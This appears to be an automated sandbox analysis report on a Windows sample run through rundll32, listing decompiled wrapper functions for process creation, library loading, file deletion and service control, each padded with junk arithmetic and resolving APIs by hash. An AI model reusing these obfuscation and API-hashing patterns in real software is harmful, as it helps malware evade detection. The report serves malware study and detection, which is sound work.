SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 001EC762

Strings

/O, xrefs: 001EC6E6

Memory Dump Source

Source File: 00000008.00000002.2102499691.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000008.00000002.2102493162.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2102521083.00000000001FC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction ID: 6944b5eda7ddc599a285dfadfb83d98871e35aac18c3631d2d2e62f16343f5b4
Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction Fuzzy Hash: DC1133B290122DBBCB25DF95DC498EFBFB8EF14754F108188F90962220D3714B659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 001E1000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E001E1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E001E602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E001F07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

0x001e1006
0x001e1009
0x001e100c
0x001e1011
0x001e1016
0x001e101d
0x001e1026
0x001e102d
0x001e1034
0x001e103b
0x001e1047
0x001e104f
0x001e1057
0x001e105e
0x001e1065
0x001e106c
0x001e1073
0x001e1077
0x001e108b
0x001e1096
0x001e109b

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 001E1096

Strings

[, xrefs: 001E103B

Memory Dump Source

Source File: 00000008.00000002.2102499691.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000008.00000002.2102493162.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2102521083.00000000001FC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction ID: e6c4d22095a37846949824c43428ebcba9464efa8f5f78c7bbe982629098abf5
Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction Fuzzy Hash: 96015BB6D0170CBBDF04DF94C94A5DEBBB1AB54318F108188E51466291D3B19B649B91

Uniqueness

Uniqueness Score: -1.00%

Function 001E4859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E001E4859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E001F07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}

0x001e485e
0x001e487a
0x001e487d
0x001e4884
0x001e488b
0x001e4892
0x001e489d
0x001e48a0
0x001e48ad
0x001e48b7

APIs

ExitProcess.KERNELBASE(00000000), ref: 001E48B7

Strings

[, xrefs: 001E488B

Memory Dump Source

Source File: 00000008.00000002.2102499691.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000008.00000002.2102493162.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2102521083.00000000001FC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ExitProcess
String ID: [
API String ID: 621844428-1822564810
Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction ID: db10be173d78d936ff7409dc4a61335d5f4ce6dd59e8ceb58d4ae770844ed64b
Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction Fuzzy Hash: 6FF0F4B0A05209BBDB04CFE8CA5699EBFB9AB40301F208188E444A7290E3B15F509A50

Uniqueness

Uniqueness Score: -1.00%

Function 001F4F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E001F4F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E001E602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E001F07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x001f4f80
0x001f4f81
0x001f4f82
0x001f4f86
0x001f4f87
0x001f4f8c
0x001f4fa5
0x001f4fa8
0x001f4faf
0x001f4fb6
0x001f4fc7
0x001f4fca
0x001f4fd7
0x001f4fe2
0x001f4fe7

APIs

CloseHandle.KERNELBASE(003E66D8), ref: 001F4FE2

Strings

{#lm, xrefs: 001F4FC2

Memory Dump Source

Source File: 00000008.00000002.2102499691.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000008.00000002.2102493162.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2102521083.00000000001FC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction ID: 3a5fbf3e33bfcad55dc1fab4b82b1efc569f49ed361eebb7fe294ba9cd13fcc4
Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction Fuzzy Hash: 50F037B081120CFFDB04EFA4D94289EBFBAEB44340F208299E804AB261D3715B509B50

Uniqueness

Uniqueness Score: -1.00%

Function 001F976F, Relevance: 1.6, APIs: 1, Instructions: 63
processCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E001F976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001E602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E001F07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}

0x001f9772
0x001f9773
0x001f9778
0x001f977a
0x001f977b
0x001f977e
0x001f977f
0x001f9782
0x001f9785
0x001f9788
0x001f9789
0x001f978c
0x001f978f
0x001f9790
0x001f9791
0x001f9794
0x001f9797
0x001f979a
0x001f979d
0x001f97a0
0x001f97a3
0x001f97a6
0x001f97a7
0x001f97a8
0x001f97ad
0x001f97b7
0x001f97c3
0x001f97ca
0x001f97d1
0x001f97d8
0x001f97df
0x001f97e3
0x001f97fc
0x001f9816
0x001f981d

APIs

CreateProcessW.KERNEL32(001E591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,001E591A), ref: 001F9816

Memory Dump Source

Source File: 00000008.00000002.2102499691.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000008.00000002.2102493162.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2102521083.00000000001FC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction ID: 86c2c147634ef3138d853ec8a87c4843de297417a20e506b2cc7360b5490e1f8
Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction Fuzzy Hash: 1D11B372901188BBDF1A9FD6DC0ACDF7F7AEF99750F104148FA1556120D2728A60EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001EB566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E001EB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E001E602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E001F07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

0x001eb569
0x001eb56a
0x001eb56d
0x001eb572
0x001eb574
0x001eb577
0x001eb57a
0x001eb57d
0x001eb580
0x001eb583
0x001eb586
0x001eb587
0x001eb58a
0x001eb58d
0x001eb590
0x001eb593
0x001eb594
0x001eb595
0x001eb59a
0x001eb5a4
0x001eb5b8
0x001eb5c0
0x001eb5c4
0x001eb5cb
0x001eb5d2
0x001eb5d9
0x001eb5e6
0x001eb5fd
0x001eb604

APIs

CreateFileW.KERNELBASE(001F0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,001F0668,?,?,?,?), ref: 001EB5FD

Memory Dump Source

Source File: 00000008.00000002.2102499691.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000008.00000002.2102493162.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2102521083.00000000001FC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction ID: 64c03b7127ba3bee54388474f9df1fc94ff169f200a39c6328bbd3ed7b90b682
Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction Fuzzy Hash: 2A11C372801248BBDF16DF95DD06CEE7F7AFF99714F148198FA1862120D3729A60EB50

Uniqueness

Uniqueness Score: -1.00%

Function 001F981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E001F981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001E602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E001F07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

0x001f9821
0x001f9822
0x001f9825
0x001f9828
0x001f982a
0x001f982c
0x001f982f
0x001f9832
0x001f9835
0x001f9836
0x001f9837
0x001f983c
0x001f9855
0x001f9858
0x001f985f
0x001f9866
0x001f986d
0x001f9874
0x001f987b
0x001f988e
0x001f989b
0x001f98a2

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,001E87F2,0000CAAE,0000510C,AD82F196), ref: 001F989B

Memory Dump Source

Source File: 00000008.00000002.2102499691.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000008.00000002.2102493162.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2102521083.00000000001FC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction ID: 1bf3bad15c3aece8f2b403b3292d11e26047bfd38b1ea934f0c7b56989d86508
Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction Fuzzy Hash: 0B019A72801208FBDB04EFD5D846CDFBF79EF95750F108188F908A6220E6715B619BA0

Uniqueness

Uniqueness Score: -1.00%

Function 001F7BF4, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E001F7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001E602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E001F07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}

0x001f7bf7
0x001f7bf8
0x001f7bfa
0x001f7bfd
0x001f7bff
0x001f7c02
0x001f7c06
0x001f7c07
0x001f7c0f
0x001f7c1d
0x001f7c25
0x001f7c2d
0x001f7c31
0x001f7c38
0x001f7c3f
0x001f7c46
0x001f7c4a
0x001f7c5e
0x001f7c67
0x001f7c6d

APIs

SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 001F7C67

Memory Dump Source

Source File: 00000008.00000002.2102499691.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000008.00000002.2102493162.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2102521083.00000000001FC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction ID: ce09fedc50eca9e1d2d8f728837780fab95cf825b4c8fb3014b54b06bea60826
Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction Fuzzy Hash: E5014FB190120CFFEB09DF94C84A8DE7BB9EF54314F108198F505A7250E7B15F509B91

Uniqueness

Uniqueness Score: -1.00%

Function 001EF65F, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E001EF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001E602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E001F07A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}

0x001ef662
0x001ef663
0x001ef665
0x001ef668
0x001ef66a
0x001ef66d
0x001ef670
0x001ef673
0x001ef677
0x001ef678
0x001ef67d
0x001ef687
0x001ef693
0x001ef69a
0x001ef6a1
0x001ef6a5
0x001ef6a9
0x001ef6b0
0x001ef6c9
0x001ef6d8
0x001ef6de

APIs

OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 001EF6D8

Memory Dump Source

Source File: 00000008.00000002.2102499691.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000008.00000002.2102493162.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2102521083.00000000001FC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction ID: 8d5c33ce5b49c7f96cbb9769759cca5bbcc1b768e543c718b67643f59ff8d05f
Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction Fuzzy Hash: C001E5B690120CBBEF05AF94DC068DF7F79EB15364F148188F90462251D7B25E61DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001EB6DD, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001EB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E001E602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E001F07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}

0x001eb6f3
0x001eb6f8
0x001eb702
0x001eb70b
0x001eb712
0x001eb719
0x001eb720
0x001eb727
0x001eb72e
0x001eb747
0x001eb759
0x001eb75e

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 001EB759

Memory Dump Source

Source File: 00000008.00000002.2102499691.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000008.00000002.2102493162.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2102521083.00000000001FC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction ID: f9da5785dbd9570073441e0a55d7972b48b4dfa7cb78d73ba810e2c20631ceef
Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction Fuzzy Hash: 4A0128B694130CFBEB45DF94DD06A9E7BB5EB18704F108188FA09661A1D3B25A20AB61

Uniqueness

Uniqueness Score: -1.00%

Function 001FAA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E001FAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001E602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E001F07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x001faa3f
0x001faa40
0x001faa41
0x001faa44
0x001faa47
0x001faa4b
0x001faa4c
0x001faa51
0x001faa5b
0x001faa64
0x001faa68
0x001faa6f
0x001faa76
0x001faa8d
0x001faa90
0x001faa9d
0x001faaa8
0x001faaad

APIs

DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 001FAAA8

Memory Dump Source

Source File: 00000008.00000002.2102499691.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000008.00000002.2102493162.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2102521083.00000000001FC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction ID: ae75e7940aa0f3f516375c71d7746bc297ccf3d88e33e1714b6200cce300473c
Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction Fuzzy Hash: 0CF069B190020CFFDF08EF94DD4A89EBFB8EB44304F108188F905A6261D3B29B549B50

Uniqueness

Uniqueness Score: -1.00%

Function 001E5FB2, Relevance: 1.5, APIs: 1, Instructions: 33
serviceCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E001E5FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E001E602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E001F07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}

0x001e5fb5
0x001e5fb6
0x001e5fb7
0x001e5fbb
0x001e5fbc
0x001e5fc1
0x001e5fcb
0x001e5fd7
0x001e5fde
0x001e5fe5
0x001e5ffc
0x001e5fff
0x001e6006
0x001e600d
0x001e601a
0x001e6025
0x001e602a

APIs

CloseServiceHandle.ADVAPI32(39CCF342), ref: 001E6025

Memory Dump Source

Source File: 00000008.00000002.2102499691.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000008.00000002.2102493162.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2102521083.00000000001FC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction ID: f4d9d5f24093db104dc701dd67091ce2778e05ea5050f4393f3df9c3ed5d6a3d
Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction Fuzzy Hash: 38F04FB0C1120CFFDB08DFA0E94689EBFB8EB50340F208198E909A7261E7715F559F54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2932 Parent PID: 2836 rundll32.exeCOMMON

Executed Functions

Function 00192959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00192959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E0019602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E001A07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

0x0019295f
0x00192964
0x00192967
0x0019296a
0x0019296d
0x0019296e
0x0019296f
0x00192977
0x00192985
0x0019298a
0x00192992
0x0019299a
0x001929a2
0x001929a9
0x001929b0
0x001929b7
0x001929bb
0x001929cf
0x001929dc
0x001929e2

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 001929DC

Strings

<^, xrefs: 00192977

Memory Dump Source

Source File: 00000009.00000002.2103529081.0000000000191000.00000020.00000001.sdmp, Offset: 00190000, based on PE: true

Associated: 00000009.00000002.2103520097.0000000000190000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2103593425.00000000001AC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction ID: 32de74989ae9685c394d309917a42935fc5c93d0bb2bdc8f371534d8ce8e83b0
Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction Fuzzy Hash: F4018072A00108BFEB14DF95DC4A8DFBFB6EF49310F108088F508A6250D7B65F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 0019C6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0019C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E0019602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E001A07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x0019c6e1
0x0019c6e6
0x0019c6f0
0x0019c6fc
0x0019c703
0x0019c706
0x0019c70d
0x0019c711
0x0019c715
0x0019c71c
0x0019c723
0x0019c72a
0x0019c731
